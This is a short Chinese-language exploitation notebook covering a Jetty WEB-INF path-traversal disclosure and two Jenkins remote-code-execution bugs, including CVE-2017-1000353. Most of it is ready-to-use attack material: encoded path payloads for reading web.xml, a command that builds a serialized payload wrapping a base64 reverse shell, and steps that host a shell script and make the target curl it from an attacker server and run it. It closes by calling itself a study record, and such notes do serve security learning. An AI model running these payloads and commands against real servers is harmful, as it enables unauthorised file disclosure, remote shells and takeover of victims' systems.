对于 <= 9.4.40、<= 10.0.2、<= 11.0.2 的 Eclipse Jetty 版本,对带有双重编码路径的 ConcatServlet 的请求可以访问 WEB-INF 目录中的受保护资源。例如,对 /concat?/%2557EB-INF/web.xml
的请求可以检索 web.xml 文件。这可能会泄露有关 Web 应用程序实施的敏感信息。
直接在url路径请求如下地址
/%2e/WEB-INF/web.xml
/.%00/WEB-INF/web.xml
/%u002e/WEB-INF/web.xml
/static?/WEB-INF/web.xml
/a/b/..%00/WEB-INF/web.
Jenkins 可以通过其网页界面轻松设置和配置,其中包括即时错误检查和内置帮助。 插件 通过更新中心中的 1000 多个插件,Jenkins 集成了持续集成和持续交付工具链中几乎所有的工具。 Jenkins的反序列化漏洞,攻击者使用该漏洞可以在被攻击服务器执行任意代码,漏洞利用不需要任何的权限
8080
所有Jenkins主版本均受到影响(包括<=2.56版本)所有Jenkins LTS 均受到影响( 包括<=2.46.1版本)
POC下载CVE-2017-1000353
java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc.ser "bash -c {echo,反弹shell命令base64编码}|{base64,-d}|{bash,-i}"
python exploit.py 目标主机地址 jenkins_poc.ser
8080
Jenkins主版本 <= 2.153
Jenkins LTS版本 <= 2.138.3
POC下载 awesome-jenkins-rce-2019
python3 -m http.server 8080
python2 exp.py 目标主机 "curl -o /tmp/1.sh http://xxxx:8080/shell.txt"
python2 exp.py 目标主机 "bash /tmp/1.sh"
以上内容仅作学习记录,如有错误或瑕疵,欢迎批评指正,感谢阅读。